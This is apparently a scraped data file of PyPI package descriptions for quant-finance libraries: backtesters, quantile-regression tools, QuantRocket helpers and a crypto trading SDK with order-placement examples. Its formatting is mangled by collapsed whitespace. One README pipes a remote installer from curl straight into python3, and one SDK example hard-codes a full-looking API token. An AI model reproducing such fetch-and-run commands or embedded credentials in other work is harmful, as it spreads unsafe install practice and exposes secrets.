A work in progress."} +{"package": "quantquestToolbox", "pacakge-description": "UNKNOWN"} +{"package": "quantr", "pacakge-description": "QuantrA simple quantum computer simulator."} +{"package": "quantrading", "pacakge-description": "quantrading\ubc31\ud14c\uc2a4\ud305 \uc720\ud2f8 \ub77c\uc774\ube0c\ub7ec\ub9ac\uc785\ub2c8\ub2e4.\uc124\uce58pip install quantrading\uc0ac\uc6a9 \uc608\uc2dcexample -> open_close_backtest_example.py \ucc38\uace0importquantradingasqtfromdatetimeimportdatetimeimportpandasaspdclassMyStrategy(qt.OpenCloseStrategy):def__init__(self,**kwargs):super().__init__(**kwargs)defon_data(self):data=self.get_available_data()today_date=self.get_date()allocation={'MSCI_WORLD_ACWI':0.8,'IEF_BOND_7_10_INDEX':0.2}print(today_date,allocation)self.set_allocation(allocation)defon_end_of_algorithm(self):data=self.get_available_data(exclude_today_data=False)stock_price=data[\"market_close_df\"]['MSCI_WORLD_ACWI']self.add_to_rebalancing_factor_history(stock_price)if__name__==\"__main__\":market_df=pd.read_csv(\"./stock_bond_data.csv\",index_col=0,parse_dates=True)market_df=market_df.ffill()custom_mp_df=pd.DataFrame(data=[[0.5,0.5]],index=[datetime(2020,1,6)],columns=['MSCI_WORLD_ACWI','IEF_BOND_7_10_INDEX',])print(custom_mp_df)simulation_args={\"market_close_df\":market_df,\"market_open_price_df\":market_df,\"name\":\"OpenCloseStrategy \uc8fc\uc2dd8 \ucc44\uad8c2 \uc804\ub7b5\",\"start_date\":datetime(2005,1,1),\"end_date\":datetime(2020,7,31),\"rebalancing_periodic\":\"quarterly\",\"rebalancing_moment\":\"first\",\"benchmark_ticker\":\"MSCI_WORLD_ACWI\",\"sell_delay\":1,\"buy_delay\":2,\"custom_mp_option\":True,\"custom_mp_start_date\":datetime(2020,1,1),\"custom_mp\":custom_mp_df,\"custom_mp_sell_delay\":0,\"custom_mp_buy_delay\":1,\"portfolio_transaction_fee\":0.02}strategy=MyStrategy(**simulation_args)strategy.run()strategy.print_result_log(display_image=True)strategy.result_to_excel(folder_path=\"simulation_result5\")"} +{"package": "quantrautil", "pacakge-description": "quantrautilQuantra\u00c2\u00ae is an e-learning portal by QuantInsti\u00c2\u00ae that specializes in Algorithmic & Quantitative Trading. Quantra offers the best self-paced courses that are a mix of videos, audios, presentations, multiple choice questions and highly interactive exercises. It gives you an unmatched practical hands-on learning experience, empowering you to learn and implement complex concepts easily. There is something special about learning a trading strategy by starting with one line of code and building upon it step by step! 
Go Quantra!The quantrautil module helps to get the OHLCV data from Yahoo, IEXFinance or nsepy.Features!Get the OHLCV data"} +{"package": "quantready", "pacakge-description": "quantreadyA CLI to quickly launch data-driven and API-first businesses - using the modern python stack\u2705\u2705\u2705 QuantReady Stack - Templates \u2728quantreadyCLI for creating and configuring projects and using the quantready-* templatesquantready-basebuild and publish python libraries and docker images\u2714\ufe0fpoetryfor dependency management\u2714\ufe0fpre-commithooks for code formatting, linting, and testing\u2714\ufe0funittestfor testing\u2714\ufe0fgitleaksfor secrets scanning\u2714\ufe0fgithub actionsfor CI/CD\u2714\ufe0fdockerfor building containers\u2714\ufe0ftwinefor publishing to pypi or private repositories\ud83d\udd32gcloudfor publishing to private repositoriesquantready-api- A template to build and deploy fastapi applicationsauthentication - api key or oauthauthorization - RBAC via OSOrate limiting - via redisjob-queues to support long-running tasksworkerscachinggithub actions to deploy to gcloudall other features of quantreadyquantready-vendor- A template to sell and meter access to your APIs. Supports time-based and usage-based pricingsupports free and paid endpointsbilling per API call or per time-periodstripe-cli integration for managing products and billingpricing-tables, account management and checkoutusage tracking apiall other features of quantready-api[quantready-chat]A template to build and deploy chatbotsSupports WebsocketsSlack Integrationall other features of quantready-vendor\ud83d\udce6 InstallationThere are two ways to install:1. Install usingquantreadycliIt is best to install as a template usingghpipinstallquantready# Create a new repoquantreadycreate--templatequantready/quantready-base2. 
Install as a templateTo install and configure yourself usingghghtemplatecopyquantready/quantready\n\npipinstalltyper\npythonconfigure.py\ud83d\udcbb DevelopmentInstall dependenciesRequires poetry and python3.10 or higherInstall Poetry fromhttps://github.com/python-poetry/install.python-poetry.org#python-poetry-installercurl-sSLhttps://install.python-poetry.org|python3-# Create a virtual environmentpython3-mvenvvenvsourcevenv/bin/activate# Install dependenciespoetryinstall# Install pre-commit hookspoetryrunpre-commitinstall--install-hooks# Create a .env file and modify it's contentscp.env.example.env\ud83d\ude80 DeploymentThe best way is to use quantready cli# Configure the project and cloud providersquantreadyconfigureThis will create a .quantready file in the root of the project.GitHub Actions: On creation of a new releaseConfigurationSet a GitHub Repository SecretPYPI_API_TOKENequal to an API key generated from your PYPI account:Generate Token here:https://pypi.org/manage/account/token/Set it as a Repository Secret here:https://github.com///settings/secrets/actionsCreate a new ReleaseGotohttps://github.com/closedloop-technologies/quantready/releases/neworGotohttps://github.com///releasesClick \"Draft a new Release\"This will trigger the GitHub Action to deploy your new release to PyPiPush Docker image# Build the imagedockerbuild-tquantready/quantready.# Run the imagedockerrun-it--rmquantready/quantready# Push the image to docker hubdockerpushquantready/quantready# Push the image to gcrdockertagquantready/quantreadygcr.io//quantreadyPublish to pypi# Build the packagepoetrybuild\npoetryruntwineuploaddist/*GetPYPI_API_TOKENfromhttps://pypi.org/manage/account/token/And set it as a github secrethttps://github.com///settings/secrets/actionsPublish to private repository# Build the packagepoetrybuild\npoetryruntwineupload--repository-urlhttps://pypi.yourdomain.comdist/*\ud83d\udcdd LicenseThis project is licensed under the terms of theMIT license.\ud83d\udcda ResourcesPython Packaging User GuidePoetryPre-commitGithub ActionsDockerTwineGcloudGitHub CLI"} +{"package": "quantready-base", "pacakge-description": "quantready-basePublish public or private python libraries - using the modern python stack\u2728 FeaturesClean Code:\u2714\ufe0fpoetryfor dependency management\u2714\ufe0fpre-commithooks for code formatting, linting, and testing\u2714\ufe0funittestfor testing\u2714\ufe0fgitleaksfor secrets scanningDeployment:\u2714\ufe0fgithub actionsfor CI/CD\u2714\ufe0fdockerfor building containers\u2714\ufe0ftwinefor publishing to pypi or private repositories\ud83d\udd32gcloudfor publishing to private repositories\ud83d\udce6 InstallationThere are two ways to install:1. Install usingquantreadycliIt is best to install as a template usingghpipinstallquantready# Create a new repoquantreadycreate--templatequantready/quantready-base2. 
Install as a templateTo install and configure yourself usingghghtemplatecopyquantready/quantready-base\n\npipinstalltyper\npythonconfigure.py\ud83d\udcbb DevelopmentInstall dependencies# Create a virtual environmentpython3-mvenvvenvsourcevenv/bin/activate# Install dependenciespoetryinstall# Install pre-commit hookspre-commitinstall--install-hooks# Create a .env file and modify it's contentscp.env.example.env\ud83d\ude80 DeploymentThe best way is to use quantready cli# Configure the project and cloud providersquantreadyconfigureThis will create a .quantready file in the root of the project.GitHub Actions: On push tomainGithub actions are configured to run on push to main.\nIt will read the config from .quantready file and\npublish the library to pypi or private repository as well as build the docker image and push it to docker hub or gcr.Push Docker image# Build the imagedockerbuild-tquantready/quantready-base.# Run the imagedockerrun-it--rmquantready/quantready-base# Push the image to docker hubdockerpushquantready/quantready-base# Push the image to gcrdockertagquantready/quantready-basegcr.io//quantready-basePublish to pypi# Build the packagepoetrybuild\npoetryruntwineuploaddist/*GetPYPI_API_TOKENfromhttps://pypi.org/manage/account/token/And set it as a github secrethttps://github.com///settings/secrets/actionsPublish to private repository# Build the packagepoetrybuild\npoetryruntwineupload--repository-urlhttps://pypi.yourdomain.comdist/*\ud83d\udcdd LicenseThis project is licensed under the terms of theMIT license.\ud83d\udcda ResourcesPython Packaging User GuidePoetryPre-commitGithub ActionsDockerTwineGcloudGitHub CLI\u2705\u2705\u2705 QuantReady Stack - TemplatesquantreadyCLI for creating and configuring projects and using the quantready-* templatesquantready-baseThis template - build and publish python libraries and docker imagesquantready-api- A template to build and deploy fastapi applicationsauthentication - api key or oauthauthorization - RBAC via OSOrate limiting - via redisjob-queues to support long-running tasksworkerscachinggithub actions to deploy to gcloudall other features of quantready-basequantready-vendor- A template to sell and meter access to your APIs. Supports time-based and usage-based pricing.supports free and paid endpointsbilling per API call or per time-periodstripe-cli integration for managing products and billingpricing-tables, account management and checkoutusage tracking apiall other features of quantready-api[quantready-chat]A template to build and deploy chatbotsSupports WebsocketsSlack Integrationall other features of quantready-vendor"} +{"package": "quantregCF", "pacakge-description": "QuantregCFThis Python package is an implementation of the control function approach for quantile regression models proposed by Sokbae Lee in \"Endogeneity in Quantile Regression Models: A Control Function Approach,\"Journal of Econometrics, 141: 1131-1158, 2007.InstallationThis project can be installed using pip:pipinstallquantregCFUsagefromquantregCFimportquantregCFbeta,se=quantregCF(option,degree,tau_first_stage,tau_second_stage,data)quantregCFreturns a list of estimated coefficients and a list of standard errors.ParametersThe main function isquantregCF(option,degree,tau_first_stage,tau_second_stage,data)option= 0 if the second-stage quantile regression uses polynomial series.option= 1 if the second-stage quantile regression uses B-spline.degreeis the degree of the polynomial/B-spline. (integer)tau_first_stageis the value of tau for the first-stage quantile regression. 
(between 0 and 1)tau_second_stageis the value of tau for the second-stage quantile regression. (between 0 and 1)datais a list of length two that contains information on the dataset.data=[`dataframe`,`var_lst`]Each element indatais defined as followed:dataframeis the dataset in the pandas DataFrame format.var_lstis a list of length four that contains the name of variables of interest. The first two elements ofvar_lstare strings and the last two elements are lists of strings.`var_lst`=[`dep_var`,`endog_var`,`exog_var_lst`,`iv_var_lst`]Each element invar_lstis defined as followed:dep_varandendog_varare the names of dependent variable and endogenous right-hand side variable.exog_var_lstandiv_var_lstare the lists of names of exogenous included variables and instrumental variables.ExampleThe filefishdata.pyillustrates how to usequantregCFon the well-known Graddy\u2019s Fulton fish market data. To run the code, simply downloadfishdata.pyfrom thetestsfolder and runpython fishdata.py. Below is a code snippet showing how to load the data and usequantregCF.# load data into DataFrame `df` from https://www.kathryngraddy.org/research#pubdatadata_source=\"https://uploads-ssl.webflow.com/629e460595fdd36617348189/62a0fd19b6742078eed59f47_fish.out.txt\"df=pd.read_csv(data_source,sep=\"\\t\")var_lst=['qty','price',[\"day1\",\"day2\",\"day3\",\"day4\"],[\"stormy\",\"mixed\"]]data_lst=[df,var_lst]# regressions using B-splines in the second-stagebeta,se=quantregCF(option=1,degree=3,tau_first_stage=0.5,tau_second_stage=0.5,data=data_lst)# calculate the 95% confidence intervalci_lb=beta[0]-1.96*se[0]ci_ub=beta[0]+1.96*se[0]DependenciesNumPyPandasSciPyCVXPYUrllib"} +{"package": "quantregpy", "pacakge-description": "No description available on PyPI."} +{"package": "quant-risk", "pacakge-description": "RiskWelcome to the Quant-Risk package!Please head over tohttps://quant-risk.readthedocs.io/en/latest/to view the latest documentation for the packageTo set up your environment:install pipenv by:pip install pipenvthen go to the main directory of this repo and do:pipenv shellUpdate your setup tools package by:python -m pip install -U pip setuptoolsNow, to install the package, run the command:pipenv install quant_riskTo exit the virtual environment do:exitSince, PyPortfolioOpt requires Visual Studio C++, do the following:Before installing and setting up your environment, install Visual Studio Build Tools from here:https://visualstudio.microsoft.com/downloads/choose the Community version if you have WindowsFrom the available softwares, select \"Visual Studio Build Tools 2019\"Now your pipenv shell should be able to install PyPortfolioOptNote: The above is for Windows users, for Mac users please see:https://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/To run a jupyter notebook instance with this venv:Activate your venv by:pipenv shellrun the command:pipenv install jupyterrun the command:pipenv run jupyter notebookAll done!\nAn instance of Jupyter notebook should now open up in your browserVersion 1.1.1Fixed minor import errorsVersion 1.1.0Added risk parity portfolios and covariance shrinkageVersion 1.0.2Removed Quandl dependency and risk free rate functionVersion 1.0.1First published working buildVersion 1.0.0Initial Build"} +{"package": "quant-risk-mgmt", "pacakge-description": "quant_risk_mgmtThis is a package for quant risk mgmt. 
Please go through the code before you import and use the functions."} +{"package": "quantrm-xd", "pacakge-description": "No description available on PyPI."} +{"package": "quantrocket-client", "pacakge-description": "Visithttps://www.quantrocket.comfor more details"} +{"package": "quantrocket-moonchart", "pacakge-description": "Performance tear sheets for backtest analysis"} +{"package": "quantrocket-moonshot", "pacakge-description": "Vectorized backtesting and trading engine"} +{"package": "quantrocket-trading-calendars", "pacakge-description": "No description available on PyPI."} +{"package": "quantrocket-utils", "pacakge-description": "QuantRocket Utility LibraryUtility methods for common tasks in QuantRocket.Installationquantrocket-utilscan be installed viapip:$pipinstallquantrocket-utilsDevelopmentThis project usespoetryfor development and release management.$ git clone git@github.com:boosting-alpha-bv/quantrocket-utils.git\n$ cd quantrocket-utils/\n$ poetry installRunning Tests$poetryruncoveragerun--branch--sourcequantrocket_utils-mpytestGenerating Coverage Reports$poetryruncoveragehtmlRunning flake8$poetryrunflake8quantrocket_utilstestsDeploying$poetrypublish--build--username\"${PYPI_USERNAME}\"--password\"${PYPI_PASSWORD}\"--no-interactionUsageThis library requires an external file that contains the listing information for the stocks it should translate.\nThis is typically exported from QuantRocket and then supplied at initialization time of the library.\nWork is currently under way to remove the dependency on QuantRocket for obtaining this listings file.# Import the library and initialize the ConID resolutionfromquantrocket_utilsimportinitializeasassets_init,Assetassets_init(\"//listings.csv\")# Create an Asset using the symbol namespy=Asset(\"SPY\")# The exchange is optional, unless two symbols of the same name exist on different exchangesspy=Asset(\"SPY\",\"ARCA\")# Create an Asset using the ConID# In this case the exchange can be inferred from the ConID, so it is always otpionalspy=Asset(756733)# ConID's can be strings as well, so don't worry about type conversionspy=Asset(\"756733\")# Access data on the objectspy.conid>>756733spy.symbol>>\"SPY\"spy.exchange>>\"ARCA\"# Check trading timesspy.can_trade(\"2019-03-04\",\"10:34:02\")>>True# Assets also support equality and comparison operations based on the ConID# However, this is mostly just useful for guaranteeing sorting order# Assets are also hashable and can thus be utilized in set operationsAsset(\"SPY\")>True"} +{"package": "quantrocket-zipline-extensions", "pacakge-description": "Extensions and adapters for using Zipline with QuantRocket"} +{"package": "quantron", "pacakge-description": "hehe"} +{"package": "quants", "pacakge-description": "quants packagePackage for Artifical Neural Network (ANN) based learning of quantifiers.It contains definition of scenes of elements and classes for both quantifier sampling and NN simple example package.ClassesQuantifer classesThese classes are a quantifier hierarchy with methods and definitions for:Scenesthat are composed of worldelementspertaining to use of a sentence of the form \"q as are bs\".Construction of quantifier if parameters (such as in the case of ExactlyN for instance) are required.Static method for generation of a completely random scene.Generation of permuted prototype scenes that are evaluated as true under the given quantifier q.Evaluation of a given scene (returnsTRUEfor scenes generated by the same quantifier q in the previous method).Classifier class approachThis 
approach assumes that quantifiers are learned as a group, essentially each quantifier qTRUEsceneis a negative example for all other quantifiers q'.\nThere is of course many scenes for which more than one quantifier is evaluated asTRUE, for instance if \"Both students are eating\" isTRUEthen \"Some students are eating\" is alsoTRUE, this can be mitigated by implicatures which we do not address.The classifier is in effect a solver for which q makes the sentence \"q as are bs\" most likely given an inputscenes.This enables us to use not only the quantifier quantify evaluation methods but the classifier in order to generate a teacher-student scheme.AE approachThe AE approach tries to let an AE look atsceneswhere a given quantifier q was used by a teacher (language speaker), this is repeated many times till whatever structure typical to scenesTRUEunder the quantifier q are encoded in the AE hidden values' represented structure. When learning is complete and when we are given a scene we use the AE as an anomaly detector to decide whether the scene is True under the quantifier q. The idea is that after seeing many qTRUEscenes a non qTRUEscene will have relatively high reconstruction errors."} +{"package": "quantsc", "pacakge-description": "No description available on PyPI."} +{"package": "quantscape", "pacakge-description": "No description available on PyPI."} +{"package": "quantscripts", "pacakge-description": "# Financial Analysis ScriptsThis repository contains a collection of Python scripts for financial analysis. The scripts cover various aspects such as Cointegration Testing, Duration Calculation, and Statistical Features computation.## Scripts### CointegrationTestTheCointegrationTestscript is designed for conducting cointegration tests on financial time series data. Cointegration is a statistical property that allows two or more time series to move together over time. This script provides functionalities for performing cointegration tests and analyzing the results.### DurationTheDurationscript focuses on calculating the duration of financial instruments. Duration is a measure of the sensitivity of the price of a bond or other debt instrument to a change in interest rates. This script allows users to compute the duration of financial instruments based on given parameters.### StatisticalFeaturesTheStatisticalFeaturesscript is dedicated to computing various statistical features of financial datasets. This includes measures such as mean, standard deviation, skewness, and kurtosis. 
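For a rough sense of what such a computation looks like, the same measures can be obtained directly with pandas (a generic sketch for illustration only, not the package's own StatisticalFeatures code; the sample returns are made up):
import pandas as pd
# hypothetical daily returns, used only to illustrate the four measures
returns = pd.Series([0.010, -0.020, 0.015, 0.003, -0.007])
print(returns.mean())      # mean
print(returns.std())       # standard deviation
print(returns.skew())      # skewness
print(returns.kurtosis())  # excess kurtosis (Fisher definition)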
These statistical features provide insights into the distribution and characteristics of the data.## UsageTo use these scripts, follow these general steps:git clonehttps://github.com/tonyyang1223/quantscripts.gitcd quantscripts## Build\nsetup.py sdist bdist_wheel\ntwine upload dist/*"} +{"package": "quant-sdk", "pacakge-description": "The Quant SDK is a python-wrapper for the Cryptocurrency trading API of Blocksize Capital.\nIt is a Python interface fully integrated with Blocksize CORE\u2122.\nIt enables the automation of algorithmic trading strategies, as well as accessing historical market data.\nFor requesting a (required) account please contact us viahttps://blocksize-capital.com/contact/The core part of the Quant SDK is the ability to automate trading strategies.\nThe potential applications of strategies are vast:\nwhile simple portfolio rebalancing mechanisms can be implemented,\nhigher-frequency quantitative strategies may be deployed as well.\nThe Quant SDK can be installed in the terminal as follows:pip install quant-sdkTo use the Quant SDK, you need to authenticate yourself using your personalized Blocksize CORE\u2122 API-Token.\nA Blocksize CORE\u2122 API-Token can be generated in the Blocksize MATRIX\u2122 API Token Settings.\nThe Quant SDK can be used to trade on all of our connected exchanges which can be found on our Matrix dashboard.Check outexamples/client.pyto see an example of each of the clients functions."} +{"package": "quant-sdk-lite", "pacakge-description": "Quant SDKThe Quant SDK is the third pillar of Blocksize Capital's product offer.\nIt is a Python interface fully integrated with Blocksize CORE\u2122. It allows the easy automation\nof algorithmic trading strategies, as well as accessing historical market data.The functionality of the Quant SDK is divided into two parts:Market DataThe Quant SDK seamlessly connects with the Blocksize CORE\u2122 websocket and allows the collection of real-time market data of\ndozens of cryptocurrencies across all connected exchanges. Additionally, functionalities such as the retrieval of customizable\nhistorical data using Blocksize CORE\u2122 RESTful API are accessible in a single line of code. This market data can be used for\nfurther analysis in order to optimize trading strategies.TradingThe core feature of the Quant SDK is the ability to automate trading strategies. Furthermore, the Quant SDK allows\nusers to simulate trading strategies before deploying real capital. 
With access to orderbook data across all our\nconnected exchanges, higher-frequency quantitative strategies may also be deployed.The following documentation will serve as a walkthrough of the functionalities of the Quant SDK, starting with the setup of the SDK.\nReading this tutorial is recommended as it delivers insights into the data structure used and explains some non-trivial parts of the\nQuant SDKTable of ContentsInstallationReal Time Market DataHistorical Market DataTradingBalancesInstallationYou can install the Quant SDK using the followingpipcommand.pip install quant-sdk-liteThe Quant SDK requires the following dependencies:pip install pandaspip install requestsCreate Your Blocksize TokenIn order to utilize the capabilites of the QuantSDK we must first generate a Blocksize API Token.A Blocksize API Token can be generated in the Blocksize MATRIX\u2122 API Token Settings.https://matrix.blocksize.capital/dashboardWe will now initialize the Blocksize Class using this API Token which will allow us to\nutilize all the capabilites of the Quant SDK.fromquant_sdk_lite.quantsdkliteimportBlockSizesdk=BlockSize('lAaUoVwxr2aOFhdS9QHa4hoVkpNPPHln99DsllOWusTLeqK2NVdIR0Ginltzr8tL5YdEGOEwIiXIHmXaUzPCYQEMbYWvwAbAyYoU9GVlPHvWq5nzxAvQZdYSzMmtj64h')We are now ready to utilize all the functionalities of the QuantSDK.Real Time Market DataThe QuantSDK enables users to access real-time data using the Blocksize Infrastructure. The following chapter\ncontains information regarding how to use the specific functions in order to receive real-time market data.Real Time Orderbook Dataget_orderbook_data(self,exchanges:str,base:str,quote:str,depth:int=1)The following example will show how the QuantSDK can be used to access real-time orderbook data in one line of code.In order to utilize this functionget_orderbook_datawe need to provide four pieces of information, namely:(1) The Exchange you wish to get orderbook data from.(2) The Base Currency(3) The Quote Currency(4) Ordebook Depth - This determines how deep we look in the orderbook. If this value is not specified by the user,\nthe function will automatically set this value to 1, which will return the best Bid/Ask price & assossiated volume.In the following example, we look for the top two Bid & Ask prices for the BTC/EUR pair on the Bittrex exchange.sdk.get_orderbook_data('Bittrex','BTC','EUR',2)This function returns the current Bittrex Orderbook best Bid / Ask prices,\nas well as the volume assossiated with those orders.[{'exchange':'BITTREX','asks':[['9188.093','0.01'],['9189.999','0.54465044']],'bids':[['9136.065','4.1373157'],['9136.064','0.05457277']]}]VWAP - Volume Weighted Average Priceget_vwap(self,base:str,quote:str,interval:str)Volume Weighted Average Price refers to the average price of a stock, weighted by the total trading volume.\nIt's used to calculate the average price of a stock over a specific timeframe. We can utilize the QuantSDK\nto gain an insight into the average price of different cryptocurrencies across multiple timeframes. In order to utilize\nthis feature, we need to decide three attributes:(1) Base Currency(2) Quote Currency(3) Time Interval - '1s' , '5s' , '30s' , '1m', '5m' , '30m' , '60m' , '2h' , '12h', '24h'In the following example, we get the VWAP of the ETH/EUR pair over a time horizon of 60 minutes.sdk.get_vwap('ETH','EUR','60m')This function returns a dictionary which includes the VWAP, Ticker, Timestamp & Volume. 
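For instance, the returned dictionary can be indexed like any other Python dict (a minimal sketch; the keys follow the sample response shown further below, and the 300 EUR threshold is a made-up placeholder):
vwap = sdk.get_vwap('ETH', 'EUR', '60m')
price = vwap['price']    # volume weighted average price over the interval
volume = vwap['volume']  # volume traded over the interval
if price > 300:          # hypothetical signal threshold
    print('ETH 60m VWAP above 300 EUR:', price, volume)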
This data can be parsed\nand used for signals within a more sophisticated trading algorithm.{'price':298.3631794349796,'ticker':'ETHEUR','timestamp':1601046000,'volume':3962.29888435}OHLC - Open High Low Closeget_ohlc(self,base:str,quote:str,interval:str)We need to input three variables in order to execute the OHLC function:(1) Base Currency(2) Quote Currency(3) Time Interval - '1s' , '5s' , '30s' , '1m', '5m' , '30m' , '60m' , '2h' , '12h', '24h'In the following example, we will find the OHLC of the XRP/EUR pair for the proceeding 60mins.sdk.get_ohlc('XRP','EUR','60m')This function returns a dictionary which includes the OHLC Prices, Ticker & Timestamp. Furthermore, this data can\nbe used to determine entry / exit points as part of a more sophisticated trading algorithm.{'close':0.2064,'high':0.20866,'low':0.20587,'open':0.2069,'ticker':'XRPEUR','timestamp':1601049600}Historical Market DataOne major issue for Traders/Investors is access to accurate historical market data. The QuantSDK solves this\nissue by accessing historical market data in one line of code. Historical market data is a crucial tool for\ndata scientists who wish to analyse market data, as well as test trading strategies.Historical OHLCget_historic_ohlc(self,base:str,quote:str,interval:str,start_date:str,end_date:str)The Historical OHLC function can be used to access these important metrics across all pairs as well\nas multiple time intervals. Five input variables are required to successfully execute this function.(1) Base Currency(2) Quote Currency(3) Time Interval (1s, 5s, 30s, 1m, 5m, 30m, 60m)(4) Start Date (YYYY-MM-DD)(5) End Date (YYYY-MM-DD)In the following example, we will find the historic OHLC of the BTC/EUR pair,\nevery hour, for ten days in September 2020.sdk.get_historic_ohlc('BTC','EUR','60m','2020-09-10','2020-09-20')This function returns a DataFrame which can be used for further analysis.2020-09-1000:00:008675.208784.9000008665.848717.402020-09-1001:00:008717.408866.1302688693.688795.202020-09-1002:00:008789.068855.5500008775.058784.20Historical VWAP - Volume Weighted Average Priceget_historical_vwap(self,base:str,quote:str,interval:str,start_date:str,end_date:str)The Historical VWAP function can be used to access the historical Volume Weighted Average Prices of all the connected\ndigital assets, across multiple different time intervals. Five input variables are required to successful execute this function.(1) Base Currency(2) Quote Currency(3) Time Interval (1s, 5s, 30s, 1m, 5m, 30m, 60m)(4) Start Date (YYYY-MM-DD)(5) End Date (YYYY-MM-DD)The following example returns the VWAP of the BTC/EUR pair, every 30 seconds, from Sept 4th - Sept 5thsdk.get_historical_vwap('BTC','EUR','30s','2020-09-04','2020-09-05')This function returns a DataFrame consisting of Time, Price & Volume.2020-09-0421:58:008945.6852720.1433622020-09-0421:58:308940.8736191.2129432020-09-0421:59:008936.6490640.3216752020-09-0421:59:308945.9420440.1933002020-09-0422:00:008939.7400210.738045TradingOne of the most impressive features of the QuantSDK is the ability to post real as well as simulated orders.\nThis feautre allows users to buy/sell every tradeable digital asset across all the connected exchanges.Simulated Orderspost_simulated_order(self,base:str,quote:str,direction:str,quantity:Union[str,float],exchange:str=None,unlimited_funds:bool=False)The Simualted Orders function can be utilized for a variety of purposes. 
It takes 6 input variables:(1) Base Currency(2) Quote Currency(3) Direction ( Buy or Sell)(4) Quantity (Amount of the Base Currency you wish to Buy/Sell)(5) Exchange (If left unspecified, it will automatically place the trade on the\nexchange which offers the best price)(6) Unlimited Funds (True or False - If left unspecified, default setting is False)In the following example, we will simulate a Buy Order of 0.2 BTC on the Bittrex Exchange.sdk.post_simulated_order('BTC','EUR','BUY',0.2,'Bittrex')Notice theunlimited_fundsvariable was left unspecified, as a result, it was set to the defaultFalse.\nThis is because we wanted to simulate an order which would also check if there was enough funds in the account\nto successfully place the trade. The result of this function is printed below.{'order':{'order_id':'6c8b37d1-b621-4f73-8e64-a529cb338f7b','base_currency':'BTC','quote_currency':'EUR','direction':2,'type':1,'quantity':'0.2','bsc_token_id':'d5d08125-795a-4edf-bfc7-2db5b1240b37','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'},'failed_reason':'FAILED_REASON_INSUFFICIENT_FUNDS','elapsed_time_retrieval':0,'elapsed_time_calculation':0,'average_execution_price':'','trading_fees':'','trades':None}Notice this simulated order was unsuccessful'failed_reason': 'FAILED_REASON_INSUFFICIENT_FUNDS'We will now simulate an order which assumes we have an infinite amount of funds our account.The following example will simulate a Sell Order of 10 BTC on the Binance Exchange.sdk.post_simulated_order('BTC','EUR','SELL',10,'Binance',True)In this example, we setunlimited_fundsasTrueAs a result, we have simulated an order which assumes infinite funds in our account.{'order':{'order_id':'8f1b1ce1-b8ad-4b09-897a-fe35c3ec3eaf','base_currency':'BTC','quote_currency':'EUR','direction':1,'type':1,'quantity':'10','bsc_token_id':'d5d08125-795a-4edf-bfc7-2db5b1240b37','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'},'elapsed_time_retrieval':22910,'elapsed_time_calculation':177,'average_execution_price':'9215.402037268002','trading_fees':'0.01','trades':[{'exchange':'BINANCE','quantity':'10.0','apikey_id':'00000000-0000-0000-0000-000000000000','average_execution_price':'9215.402037268002','trading_fees':'0.01','funds':'-1','fee_bp':'10','trade_id':'4a363f00-9e6b-4c6e-a61b-47e4a2676f88','buffer_bp':'25'}]}Real Orderspost_market_order(self,base:str,quote:str,direction:str,quantity:Union[str,float],exchange:str)Another feauter of the QuantSDK is the ability to place orders on individual exchanges, as well as taking\nadvantage of the Blocksize SOR trading algorithm. 
It takes 5 input variables:(1) Base Currency(2) Quote Currency(3) Direction ( Buy or Sell)(4) Quantity (Amount of the Base Currency you wish to Buy/Sell)(5) Exchange (If left unspecified, it will automatically place the trade on the\nexchange which offers the best price)In the following example, we will sell 0.15 ETH on the Bittrex Exchange.sdk.post_market_order('eth','eur','sell',0.15,'bittrex')The function returns the unique order-ID, as well as other details about the trade.{'order':{'order_id':'02963299-f1e2-4ca6-b34a-2a89940ed42a','base_currency':'ETH','quote_currency':'EUR','direction':1,'type':1,'quantity':'0.15','bsc_token_id':'4a68e081-de91-4b40-a615-85e472a8fa75','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'}}In the following example, we will attempt to buy 1 BTC on the Binance Exchange:sdk.post_market_order('BTC','EUR','BUY',1,'BINANCE')The purpose of this example is to show that if the balance is not sufficient to successfully execute the trade,\nthe function will return'failed_reason': 'FAILED_REASON_INSUFFICIENT_FUNDS'. This can be seen in the response below.{'order':{'order_id':'f8faeccb-47d9-46b0-ba28-81d54a073e46','base_currency':'BTC','quote_currency':'EUR','direction':2,'type':1,'quantity':'1','bsc_token_id':'4a68e081-de91-4b40-a615-85e472a8fa75','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'},'failed_reason':'FAILED_REASON_INSUFFICIENT_FUNDS'}Order Statusorder_status(self,order_id:str)We can check the status of individual orders by using theorder_stauts()function. The only input is\nthe unique order-id.In the following example we will check the status of the 0.15 ETH Buy Order which we placed earlier.sdk.order_status('02963299-f1e2-4ca6-b34a-2a89940ed42a')This function will returns several details about the trade. Most noteably we can see the trade status.Theaggregated_status:can be interpreted as follows:(1) Open Order, (2) Closed Order, (3) Failed Order, (4) Partially Filled Order.We can also see thetimestampassosiated with the trade as well as theexecuted_price.{'aggregated_status':2,'order':{'order_id':'02963299-f1e2-4ca6-b34a-2a89940ed42a','base_currency':'ETH','quote_currency':'EUR','direction':1,'type':1,'quantity':'0.15','bsc_token_id':'4a68e081-de91-4b40-a615-85e472a8fa75','user_id':'Zh4WxmYDNihRbFLIBQk6w4QjNul1','order_timestamp':1601289889745},'orderid':'02963299-f1e2-4ca6-b34a-2a89940ed42a','trade_status':[{'trade':{'trade_id':'30c6edae-0928-4986-acf9-2d6946c22b91','exchange':'BITTREX','trade_quantity':'0.15'},'execution_status':2,'status_report':{'trade_status':3,'exchange_trade_id':'8c0b7d3c-1d22-4169-aef7-c31327582588','placed_timestamp':1601289890114,'closed_timestamp':1601289890050,'executed_quantity':'0.15','executed_price':'307.131','status_timestamp':1601289896067}}],'userid':'Zh4WxmYDNihRbFLIBQk6w4QjNul1'}BalancesThe Quant SDK makes it very simple to check the balance of your connected exchanges.sdk.get_exchange_balances()The response will be a list which displays the total value of each cryptocurrency on each connected exchange.If you have no funds on your connected exchanges, the response will simply be:None"} +{"package": "quantservice", "pacakge-description": "Quant Service"} +{"package": "quantsight", "pacakge-description": "This is a Python client for the Quantsight Data API, which allows you to fetch historical funding rates, candle data, and perform custom queries from supported exchanges. 
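As a closing illustration for the Quant SDK section above (before the Quantsight client description continues), here is a hypothetical polling loop built on the order_status() codes just described; `sdk` and the order id are assumed to come from the earlier examples.

```python
import time

# Sketch only: `sdk` is an initialised Quant SDK client and `order_id` a value
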